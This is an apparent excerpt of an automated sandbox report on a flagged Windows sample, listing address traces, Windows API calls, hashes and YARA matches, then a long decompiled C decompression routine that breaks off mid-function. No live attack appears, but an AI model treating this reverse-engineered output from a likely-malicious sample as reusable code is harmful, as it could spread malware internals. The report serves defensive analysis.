0x70b21db9
0x70b21dbb
0x70b21dbd
0x70b21dbd
0x70b21dc3
0x70b21dc9
0x70b21dcb
0x70b21ddf
0x70b21ddf
0x70b21de1
0x70b21dcd
0x70b21dd3
0x70b21dd6
0x70b21dd6
0x00000000
0x70b21d68
0x70b21d68
0x70b21d68
0x70b21d69
0x70b21d71
0x70b21d75
0x70b21d7b
0x70b21d7f
0x70b21de7
0x70b21dea
0x70b21dee
0x70b21e61
0x70b21e65
0x70b21c43
0x00000000
0x70b21c43
0x00000000
0x70b21e65
0x70b21d6b
0x70b21d6b
0x70b21d6c
0x00000000
0x00000000
0x70b21d6e
0x70b21d6f
0x00000000
0x00000000
0x00000000
0x70b21d6f
0x70b21d66
0x70b21d00
0x70b21d09
0x70b21d0c
0x70b21d19
0x70b21d19
0x70b21d0e
0x70b21d0e
0x00000000
0x70b21d00
0x70b21c68
0x70b21c6b
0x70b21cce
0x70b21cd1
0x70b21ce3
0x70b21ce3
0x70b21ce6
0x70b21df3
0x70b21df6
0x70b21df6
0x70b21df8
0x70b221ae
0x70b221c6
0x70b221c6
0x70b221c9
0x00000000
0x00000000
0x70b221b3
0x70b221b4
0x70b221b7
0x70b221ba
0x70b22244
0x70b2224b
0x70b22251
0x70b22255
0x70b21e5c
0x70b21e5d
0x70b21e5d
0x70b21e5e
0x00000000
0x70b21e5e
0x70b221c0
0x70b221c3
0x70b221c3
0x70b221cb
0x70b221ce
0x70b22238
0x70b21e51
0x70b21e54
0x70b21e57
0x70b21e5a
0x70b21e5a
0x00000000
0x70b21e5a
0x70b221d0
0x70b221d3
0x70b221da
0x70b221da
0x70b221dd
0x70b221e1
0x70b221f5
0x70b221f5
0x70b221f8
0x70b221fc
0x00000000
0x00000000
0x70b221fe
0x70b22202
0x00000000
0x00000000
0x70b22204
0x70b2220b
0x70b2220b
0x70b22211
0x70b22214
0x70b22230
0x70b22216
0x70b2221f
0x70b22222
0x70b22222
0x00000000
0x70b22214
0x70b221e3
0x70b221e6
0x70b221ea
0x00000000
0x00000000
0x70b221ec
0x00000000
0x70b221ec
0x70b221d5
0x70b221d8
0x00000000
0x00000000
0x00000000
0x70b221d8
0x70b21dfe
0x70b21dfe
0x70b21dff
0x70b21f49
0x70b21f49
0x70b21f50
0x70b21f53
0x00000000
0x00000000
0x70b21f60
0x00000000
0x70b2214b
0x70b2214e
0x70b22151
0x70b22151
0x70b22152
0x70b22153
0x70b22156
0x70b22159
0x70b2215c
0x00000000
0x00000000
0x70b2215e
0x70b2215e
0x70b22162
0x70b2217a
0x70b2217d
0x70b22181
0x70b22187
0x00000000
0x70b22187
0x70b22164
0x70b22164
0x70b22167
0x00000000
0x00000000
0x70b22169
0x70b2216c
0x70b2216e
0x70b2216f
0x70b2216f
0x70b2216f
0x70b22170
0x70b22173
0x70b22176
0x70b22177
0x70b22151
0x70b22152
0x70b22153
0x70b22156
0x70b22159
0x70b2215c
0x00000000
0x00000000
0x00000000
0x70b2215c
0x00000000
0x70b21fa7
0x00000000
0x00000000
0x70b21fb3
0x00000000
0x00000000
0x70b21f9a
0x70b21f9e
0x70b21fa2
0x00000000
0x00000000
0x70b2211c
0x70b22120
0x00000000
0x00000000
0x70b22126
0x70b2212f
0x70b22136
0x70b2213e
0x00000000
0x00000000
0x70b22083
0x00000000
0x00000000
0x70b21fbc
0x00000000
0x00000000
0x70b221a6
0x00000000
0x00000000
0x70b2208b
0x70b2208d
0x70b2208d
0x00000000
0x00000000
0x70b22196
0x00000000
0x00000000
0x70b2219a
0x00000000
0x00000000
0x70b221a2
0x00000000
0x00000000
0x70b220d3
0x70b220d5
0x70b220d5
0x00000000
0x00000000
0x70b2209d
0x70b2209f
0x70b2209f
0x00000000
0x00000000
0x70b220af
0x70b220b1
0x70b220b1
0x00000000
0x00000000
0x70b220e1
0x70b220e3
0x70b220e3
0x00000000
0x00000000
0x70b220ba
0x70b220bc
0x70b220bc
0x00000000
0x00000000
0x70b220c1
0x00000000
0x00000000
0x70b2219e
0x70b221a8
0x70b221a8
0x00000000
0x00000000
0x70b220ec
0x70b220f0
0x70b220f5
0x70b220f8
0x70b220f9
0x70b220fc
0x70b22102
0x70b22102
0x00000000
0x00000000
0x70b2218e
0x00000000
0x00000000
0x70b220c5
0x70b220c7
0x70b220c7
0x00000000
0x00000000
0x70b21fc3
0x70b21fc3
0x00000000
0x00000000
0x70b220da
0x70b220dc
0x70b220dc
0x00000000
0x00000000
0x70b21f67
0x70b21f6d
0x70b21f70
0x70b21f72
0x70b21f72
0x70b21f75
0x70b21f79
0x70b21f86
0x70b21f88
0x70b21f8e
0x70b21f8e
0x70b21f8e
0x00000000
0x00000000
0x70b2208e
0x70b2208e
0x70b22090
0x70b22097
0x00000000
0x00000000
0x70b220d6
0x70b220d6
0x00000000
0x00000000
0x70b220a0
0x70b220a0
0x70b220a2
0x70b220a9
0x00000000
0x00000000
0x70b220b2
0x70b220b2
0x70b220b4
0x00000000
0x00000000
0x70b220e4
0x70b220e4
0x00000000
0x00000000
0x70b220bd
0x70b220bd
0x00000000
0x00000000
0x70b2210a
0x70b2210e
0x70b22113
0x70b22116
0x00000000
0x00000000
0x70b220c8
0x70b220c8
0x70b220cb
0x70b220cd
0x00000000
0x00000000
0x70b220dd
0x70b220dd
0x70b220e6
0x70b220e6
0x70b21fc5
0x70b21fc5
0x70b21fc8
0x70b21fcf
0x70b21fd1
0x70b21fd3
0x70b21fda
0x70b21fdd
0x70b21fe2
0x70b21fe4
0x70b21fe6
0x70b21fea
0x70b21ff0
0x70b21ff6
0x70b21ff6
0x70b21ff8
0x70b21ff8
0x70b21ff9
0x70b21ff9
0x70b21ffd
0x70b22003
0x70b22005
0x70b22009
0x70b2200e
0x70b2200e
0x70b22010
0x70b22010
0x70b22013
0x70b22016
0x70b2201f
0x70b22025
0x70b22028
0x70b22028
0x70b2202a
0x70b2202d
0x70b22033
0x70b22039
0x70b22039
0x70b2203b
0x00000000
0x00000000
0x70b22041
0x70b22041
0x70b22045
0x70b2204c
0x70b2204d
0x70b2204d
0x70b2204d
0x70b21ff2
0x70b21ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x70b21f60
0x70b21e05
0x70b21e05
0x70b21e06
0x70b21f46
0x00000000
0x70b21f46
0x70b21e0c
0x70b21e0d
0x00000000
0x00000000
0x70b21e13
0x70b21e16
0x70b21f0b
0x70b21f0b
0x70b21f0e
0x70b21f23
0x70b21f25
0x70b21f25
0x70b21f26
0x70b21f29
0x70b21f2c
0x70b21f38
0x70b21f38
0x70b21f38
0x70b21f2e
0x70b21f2e
0x70b21f2e
0x70b21f3e
0x00000000
0x70b21f3e
0x70b21f10
0x70b21f10
0x70b21f11
0x70b21f1f
0x00000000
0x70b21f1f
0x70b21f14
0x70b21f15
0x00000000
0x00000000
0x70b21f1b
0x00000000
0x70b21f1b
0x70b21e1c
0x70b21f07
0x00000000
0x70b21f07
0x70b21e22
0x70b21e22
0x70b21e25
0x70b21e4e
0x00000000
0x70b21e4e
0x70b21e27
0x70b21e27
0x70b21e2a
0x70b21e44
0x00000000
0x70b21e44
0x70b21e2c
0x70b21e2c
0x70b21e2f
0x70b21e3e
0x00000000
0x70b21e3e
0x70b21e32
0x70b21e33
0x00000000
0x00000000
0x70b21e35
0x00000000
0x70b21cec
0x70b21cec
0x70b21cef
0x00000000
0x70b21cef
0x70b21ce6
0x70b21cd3
0x70b21cd8
0x00000000
0x00000000
0x70b21cda
0x70b21cdd
0x00000000
0x00000000
0x00000000
0x70b21cdd
0x70b21c6d
0x70b21c70
0x70b21ca6
0x70b21ca9
0x00000000
0x70b21caf
0x70b21cb1
0x70b21cb5
0x70b21cbc
0x70b21cc3
0x70b21cc6
0x70b21cc9
0x00000000
0x70b21cc9
0x70b21ca9
0x70b21c72
0x70b21c73
0x70b21c8e
0x70b21c91
0x00000000
0x70b21c97
0x70b21c97
0x70b21c9e
0x70b21ca1
0x00000000
0x70b21ca1
0x70b21c91
0x70b21c78
0x00000000
0x70b21c7e
0x70b21c7e
0x70b21c85
0x00000000
0x70b21c85
0x70b21c78
0x70b21e74
0x70b21e79
0x70b21e7e
0x70b21e82
0x70b22355
0x70b2235b
0x70b21e94
0x70b21e96
0x70b21e97
0x70b2227e
0x70b2227e
0x70b22281
0x70b22284
0x70b222a1
0x70b222a7
0x70b222a9
0x70b222af
0x70b222c6
0x70b222c6
0x70b222c6
0x70b222d3
0x70b222d9
0x70b222dc
0x70b222e2
0x70b222e4
0x70b222e8
0x70b222ea
0x70b222f1
0x70b222f6
0x70b222f9
0x70b222fb
0x70b22300
0x70b22312
0x70b22312
0x70b22300
0x70b222f9
0x70b222e8
0x70b22318
0x70b2231b
0x70b22325
0x70b2232d
0x70b2233a
0x70b22340
0x70b22343
0x70b22273
0x70b22273
0x00000000
0x70b22273
0x70b22349
0x70b2234f
0x70b2234f
0x00000000
0x00000000
0x70b22351
0x70b22351
0x70b22351
0x70b22351
0x00000000
0x70b2231d
0x70b2231d
0x70b22323
0x00000000
0x00000000
0x00000000
0x70b22323
0x70b2231b
0x70b222b2
0x70b222b8
0x70b222ba
0x70b222c0
0x00000000
0x00000000
0x00000000
0x70b222c0
0x70b22286
0x70b2228d
0x70b22293
0x70b22299
0x00000000
0x70b22299
0x70b21e9d
0x70b21e9e
0x70b2225d
0x70b2225d
0x70b22263
0x70b22266
0x00000000
0x00000000
0x70b2226d
0x70b22272
0x00000000
0x70b22272
0x70b21ea5
0x00000000
0x00000000
0x70b21eab
0x70b21eab
0x70b21eb4
0x70b21eb9
0x70b21ebf
0x00000000
0x00000000
0x70b21ec5
0x70b21ed2
0x70b21ed8
0x70b21ee2
0x70b21ee8
0x70b21ef0
0x70b21f00
0x00000000
0x70b21f00

APIs

Part of subcall function 70B212BB: GlobalAlloc.KERNEL32(00000040,?,70B212DB,?,70B2137F,00000019,70B211CA,-000000A0), ref: 70B212C5

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70B21D2D
lstrcpyW.KERNEL32(00000008,?), ref: 70B21D75
lstrcpyW.KERNEL32(00000808,?), ref: 70B21D7F
GlobalFree.KERNEL32(00000000), ref: 70B21D92
GlobalFree.KERNEL32(?), ref: 70B21E74
GlobalFree.KERNEL32(?), ref: 70B21E79
GlobalFree.KERNEL32(?), ref: 70B21E7E

Memory Dump Source

Source File: 00000000.00000002.1129932425.0000000070B21000.00000020.00000001.01000000.00000005.sdmp, Offset: 70B20000, based on PE: true

Associated: 00000000.00000002.1129862277.0000000070B20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1129989345.0000000070B24000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1130059756.0000000070B26000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70b20000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy
String ID:
API String ID: 852173138-0
Opcode ID: f7bbef369d8e534adbc7ec8c1497bf9db9b5fb220bdce3dcd9f851823c0e8e27
Instruction ID: 017c9e271feb9806018684c576906893a2e56181fc7023eed67af68d459516db
Opcode Fuzzy Hash: f7bbef369d8e534adbc7ec8c1497bf9db9b5fb220bdce3dcd9f851823c0e8e27
Instruction Fuzzy Hash: DB22AB71D10209EEDB11CFA4E9806EEB7F4FB98307F20492ED56AE2284E7745B81DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02AC7342 Relevance: 1.5, Strings: 1, Instructions: 245libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02AD3203

Strings

0E, xrefs: 02AC73C0

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: 0E
API String ID: 1029625771-2513510507
Opcode ID: e8e5098e55e2f30f9d04cc9123e2d36d5786d0922932261246ccc41c6807ad78
Instruction ID: f650656659b56f11b5f1beccd7983a9405cba66c9d18006c12e86f4cf4399a70
Opcode Fuzzy Hash: e8e5098e55e2f30f9d04cc9123e2d36d5786d0922932261246ccc41c6807ad78
Instruction Fuzzy Hash: A681587264434A9FDF349E24CC947DB37A7EF96790F95412ECC899B204DB308986CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02AC02BF Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

0;, xrefs: 02AC05BE

Memory Dump Source

Source File: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ac0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 0;
API String ID: 0-798281000
Opcode ID: d29a1ffba16858742fcbda6800459e00db37e9419eaf79975a7c494cbab5bf7c
Instruction ID: f4d968d8874cd5b2e403623591ddf88666017d97b41cd65024bf1bffbe652c81
Opcode Fuzzy Hash: d29a1ffba16858742fcbda6800459e00db37e9419eaf79975a7c494cbab5bf7c
Instruction Fuzzy Hash: EC317CB4608306CFDF345AB59AE13EF367A8F162A0FB0416ECC47D6142EF61C088C506

Uniqueness

Uniqueness Score: -1.00%

Function 00406D85 Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
